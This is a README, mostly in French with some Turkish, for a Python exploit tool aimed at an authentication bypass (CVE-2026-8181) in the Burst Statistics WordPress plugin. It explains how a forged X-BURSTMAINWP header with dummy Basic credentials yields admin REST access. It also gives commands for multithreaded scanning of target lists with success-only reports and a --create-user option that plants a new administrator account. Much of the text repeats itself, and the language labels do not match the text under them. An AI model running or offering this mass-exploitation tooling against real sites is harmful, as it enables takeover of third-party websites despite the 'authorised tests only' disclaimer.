
CVE-2026-8181 PoC : contournement de l'authentification de Burst Statistics (3.4.0–3.4.1.1). Outil Python — analyses mono-cible et multi-cibles, workers multithreadés, rapports TXT. Tests autorisés uniquement. Mainteneur : mürrez.
EN : PoC contrôlé et brèves notes techniques pour tests de sécurité autorisés du contournement d’authentification dans Burst Statistics.
TR : PoC contrôlé et bref résumé technique pour tests de sécurité autorisés du contournement d’authentification dans Burst Statistics.
Remarque : Le chiffre de plus de 200 000 installations actives sur WordPress.org représente la base d’utilisateurs totale du plugin — cela ne signifie pas que chaque site exécute une version vulnérable. L’impact réel nécessite de vérifier version + environnement (HTTP / disponibilité des mots de passe d’application, etc.).
Remarque : Le nombre de plus de 200 000 installations actives sur WordPress.org représente la base d’utilisateurs totale du plugin ; cela ne signifie pas que tous les sites exécutent une version vulnérable. Pour l’impact réel, version + environnement (HTTP, compatibilité des mots de passe d’application, etc.) doivent être vérifiés.
Le Markdown de GitHub n’intègre pas de GIF binaires sans fichier dans le dépôt. Les extraits Typing SVG ci-dessus (CDN) simulent l’animation. Pour ajouter votre propre capture d’écran :

Le Markdown de GitHub ne prend pas en charge l’intégration de GIF sans fichier dans le dépôt. Les extraits Typing SVG ci-dessus (CDN) produisent une animation de texte. Pour votre propre démonstration :

flowchart LR
A[Client request] --> B[X-BURSTMAINWP: 1]
A --> C[Authorization: Basic]
B --> D[plugins_loaded]
D --> E[is_mainwp_authenticated]
E --> F{wp_authenticate_application_password == null?}
F -->|Mis-handled branch| G[get_user_by login]
G --> H[wp_set_current_user]
H --> I[REST: full admin context]
flowchart LR
A[İstek] --> B[X-BURSTMAINWP: 1]
A --> C[Authorization: Basic]
B --> D[plugins_loaded]
D --> E[is_mainwp_authenticated]
E --> F{wp_authenticate_application_password == null?}
F -->|Yanlış dal| G[get_user_by login]
G --> H[wp_set_current_user]
H --> I[REST: tam admin bağlamı]
Avec -f, -o et --output-dir s’excluent mutuellement.
En mode -f, -o et --output-dir ne peuvent pas être utilisés ensemble.
pip3 install requests urllib3
# Single site, report file
python3 CVE-2026-8181.py -u http://lab.local -U admin -o report.txt -k
# Single site + new admin (lab)
python3 CVE-2026-8181.py -u http://lab.local -U admin --create-user -o report.txt -k
# Bulk + combined file (successes only)
python3 CVE-2026-8181.py -f targets.txt -j 20 -o successes.txt -k
# Bulk + per-host files in folder (successes only)
python3 CVE-2026-8181.py -f targets.txt -j 20 --output-dir ./results -k
# Tek site, rapor
python3 CVE-2026-8181.py -u http://lab.local -U admin -o sonuc.txt -k
# Tek site + yeni yönetici (lab)
python3 CVE-2026-8181.py -u http://lab.local -U admin --create-user -o sonuc.txt -k
# Çoklu + birleşik dosya (yalnızca başarılılar)
python3 CVE-2026-8181.py -f targets.txt -j 20 -o basarili.txt -k
# Çoklu + klasörde site başına dosya (yalnızca başarılılar)
python3 CVE-2026-8181.py -f targets.txt -j 20 --output-dir ./results -k
Password: videUn contournement réussi ne divulgue pas le mot de passe réel de l’utilisateur victime — le mot de passe Basic du PoC est factice. La ligne Password: reste vide sauf si --create-user a créé un nouveau compte (dans ce cas, le mot de passe généré est écrit).
Un contournement réussi ne divulgue pas le mot de passe réel de l’utilisateur existant — le mot de passe Basic du PoC est factice. La ligne Password: reste vide tant qu’aucun nouveau compte n’est créé avec --create-user ; s’il est créé, le mot de passe généré est écrit.
Réservé aux évaluations autorisées par écrit et à votre propre laboratoire uniquement. Toute utilisation non autorisée est illégale dans de nombreuses juridictions. Les auteurs et le mainteneur de ce README déclinent toute responsabilité en cas de mauvaise utilisation.
Réservé aux évaluations autorisées par écrit et à votre propre laboratoire. Toute utilisation non autorisée est illégale dans de nombreux pays. Les auteurs et l’éditeur de ce README ne sont pas responsables en cas de mauvaise utilisation.
| Champ | Détail |
|---|
| Quoi | Contournement d’authentification (CWE-287) dans Burst Statistics : des en-têtes forgés peuvent élever les requêtes REST vers un contexte administrateur complet. |
| Versions | Vulnérables : 3.4.0, 3.4.1, 3.4.1.1 · Utiliser : 3.4.2 ou plus récent |
| Sévérité | CVSS ~9,8 (Critique) ; à distance, sans authentification dans les conditions applicables. |
| Ce dépôt | CVE-2026-8181.py — automatisation de laboratoire : cible unique, liste groupée, pool de threads, sortie TXT sélective. |
| Champ | Détail |
|---|
| Quoi | Contournement d’authentification (CWE-287) pour Burst Statistics. Des en-têtes personnalisés pour obtenir un contexte administrateur complet dans les requêtes REST. |
| Versions | Touchées : 3.4.0, 3.4.1, 3.4.1.1 · Recommandé : 3.4.2 et plus |
| Sévérité | CVSS ~9,8 (Critique) ; à distance et sans authentification dans des conditions appropriées. |
| Ce dépôt | CVE-2026-8181.py — automatisation de laboratoire : cible unique, scan de liste, pool de threads, sortie TXT sélective. |
| Fonctionnalité | Description |
|---|
| Cible unique | -u URL de base |
| Cibles groupées | -f targets.txt (une URL par ligne ; les # sont des commentaires) |
| Parallélisme | -j N workers (plafonné) |
| Fichier combiné | -o file.txt — avec -f, seuls les exploits réussis sont ajoutés |
| Fichiers par hôte | --output-dir — seuls les succès obtiennent host.txt (les échecs sont ignorés) |
| Nouvel admin | --create-user — utilisateur aléatoire via REST (le mot de passe apparaît ensuite dans le rapport) |
| TLS (lab) | -k désactive la vérification du certificat (labs de confiance uniquement) |
| Fonctionnalité | Description |
|---|
| Cible unique | -u adresse racine |
| Cibles multiples | -f targets.txt (une URL par ligne ; commentaire #) |
| Parallélisme | -j N workers (plafonné) |
| Fichier unique | -o dosya.txt — avec -f, seul l’exploit réussi est ajouté |
| Dossier de sortie | --output-dir — seuls les succès obtiennent host.txt |
| Nouvel admin | --create-user — utilisateur aléatoire via REST (le mot de passe figure dans le rapport) |
| TLS (lab) | -k désactive la vérification du certificat (labs de confiance uniquement) |